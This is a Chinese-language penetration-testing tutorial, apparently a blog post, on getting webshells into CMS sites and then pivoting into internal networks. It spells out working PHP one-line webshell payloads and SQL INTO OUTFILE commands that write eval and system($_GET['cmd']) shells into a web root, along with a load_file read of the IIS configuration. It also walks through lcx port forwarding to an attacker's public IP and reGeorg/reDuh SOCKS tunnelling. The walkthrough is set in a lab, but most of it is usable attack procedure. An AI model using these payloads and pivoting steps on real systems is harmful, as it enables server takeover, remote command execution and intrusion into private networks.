获取webshell的方法:
1.cms获取webshell(百度)
2.非cms获取webshell
1.数据库备份
2.抓包上传
3.sql命令
4.模板修改
5.插入一句话
6.修改上传类型(编辑器漏洞)
3.其他获取webshell方法
1.tomcat获取
2.weblogic获取
3.jboss获取
内网渗透使用的工具:lcx.exe(有公网地址的情况使用);reDuh(内网到内网,没有公网地P址)、使用reGeorgSocksProxy.py和Proxifie软件(使用的是socker5代理)【内网到内网到内网】
1.2 非cms获取webshell的方法
1.2.1 数据库备份
以良精 通用企业网站管理系统 试用版为例。
(1).登陆后台之后找到一个具有文件上传功能的模块,上传一个一句话木马图片,会生成一个上传路径。
![](https://img.haomeiwen.com/i11412812/4d29d47a78642f2f.png)
(2).在找到数据库备份的模块,将数据库备份地址改为刚才文件上传的成功后返回的路径,即将一句话木马图片备份。
![](https://img.haomeiwen.com/i11412812/fba8bdfb1fad8a71.png)
3.使用菜刀工具进行连接。获取webshell.
![](https://img.haomeiwen.com/i11412812/84ecf0924ebf81aa.png)
1.2.2 插入一句话木马获取webshell
1.找到文本框能输入的地方,在进行测试,看是否能插入一句话木马。
![](https://img.haomeiwen.com/i11412812/1bbb7387d8f2a6ca.png)
2.在插入一句话木马之后进行保存,看保存的文件中是否插入了一句话木马。
![](https://img.haomeiwen.com/i11412812/8111ec2d576d7bd3.png)
![](https://img.haomeiwen.com/i11412812/91763305d6d10481.png)
3.确保插入之后,使用菜刀进行连接。
![](https://img.haomeiwen.com/i11412812/daea19c756ecd7df.png)
1.2.3 sql命令获取webshell
1.安装dedecms,前提条件是safe_mode是不勾选状态
![](https://img.haomeiwen.com/i11412812/ace33b1f8fbff956.png)
![](https://img.haomeiwen.com/i11412812/2b75874a9aab5c50.png)
![](https://img.haomeiwen.com/i11412812/a151a6b362a395c5.png)
安装成功之后需要将php切回最低版本.
2.进入phpmyadmin,创建一个表,插入木马,输出到网站根路径,在使用菜刀进行连接。
第一种
CREATE TABLE `mysql`.`best` (`best1` TEXT NOT NULL );
INSERT INTO `mysql`.`best` (`best1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `best1` FROM `best` INTO OUTFILE ‘D:\\phpStudy\\WWW\\best111111.php’;
DROP TABLE IF EXISTS `best`;
第二种方法
Create TABLE oldboy (best text NOT NULL);
Insert INTO oldboy (best) VALUES('<?php @eval($_POST[pass]);?>');
select best from oldboy into outfile 'C:\\php\\htdocs\\best111111.php';
Drop TABLE IF EXISTS oldboy;
第三种方法:
select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'C:\\php\\htdocs\\best111111.php';
也可以这样
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'C:/php/htdocs/best111111.php'
![](https://img.haomeiwen.com/i11412812/0e4cc0b434592366.png)
二、读取文件内容
select load_file(‘c://windows//system32//inetsrv//MetaBase.xml
');
c:/windows/system32/inetsrv/MetaBase.xml
是iis的配置文件,包含所有网站的配置路径,ip端口等。
使用这种方法输出时需要设置:
![](https://img.haomeiwen.com/i11412812/ba4b3077b155906e.png)
2 内网渗透
2.1 开启3389端口
1.通过修改注册表开启远程终端,详情请看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2.通过3389工具开启远程连接。
如何判断端口是否开放:
没有改端口的情况下可以用
使用命令:
netstat -ano
tasklist /svc
改3389端口可以使用大马查看改变之后的端口号。
2.2 服务器处于内网如何远程连接
2.2.1 使用icx工具解决内网远程连接
有公网的情况下:
1.Webshell上执行:lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389 (将本机3389端口流量转发到公网ip的2222端口上去)
![](https://img.haomeiwen.com/i11412812/e9c8d316ad95a507.png)
-
自己的电脑里面执行:lcx.exe -listen 2222 4444 (监听本地的2222端口将流量转发到4444 )
image.png
image.png
2.2.2 通过端口转发脚本解决内网远程连接
如果两台机器都处于内网的情况下,没有公网地址的情况下,可以使用以下方法:
1.通过上传一句话木马到网站,在使用菜刀链接,上传reDuh.php文件。
2.在物理机上打开reDuh的客户端,输入url。修改映射的端口号。
![](https://img.haomeiwen.com/i11412812/f48124238f14feeb.png)
2.2.3 内网渗透(内到内到内渗透)
攻击机属于内网攻击的服务器也属于内网,在渗透其他的主机也属于内网。
本次实验需要三台机器,
win2003需要设置两张网卡,192.168.60网段和172.16.0网段。
win2007设置为172.16.0网段。
win2010(物理机)设置为192.168.60网段。
本次实验的目的是物理机可以访问172.16.0网段
1.设置ip,win2003 172.16.0.4
win 2007设置为172.16.0.6
2.使用菜刀上传文件tunnel.nosocket.php到2003系统。并进行访问。
![](https://img.haomeiwen.com/i11412812/d4105da69b662607.png)
3.在物理机运行reGeorgSocksProxy.py脚本。并使用命令:reGeorgSocksProxy.py -p 9999 -u http://192.168.60.102:200/tunnel.nosocket.php
![](https://img.haomeiwen.com/i11412812/3ff914c5f666f6f0.png)
使用这个链接的方法解决:
https://blog.csdn.net/qq_36196621/article/details/89918601
脚本安装成功:
![](https://img.haomeiwen.com/i11412812/b6d1e49808b4de9e.png)
4.在物理机安装Proxifier。并进行设置。
设置代理服务器:
![](https://img.haomeiwen.com/i11412812/2896cd1e7fb6be8a.png)
设置代理规则:
![](https://img.haomeiwen.com/i11412812/d2cc27ab2fbf8126.png)
设置好之后访问172.16.0网段,访问成功。
![](https://img.haomeiwen.com/i11412812/939c3c85c7253b1d.png)
brupsute如果被加入黑名单的话,是抓取不到数据的。可以使用socker5代理。
网友评论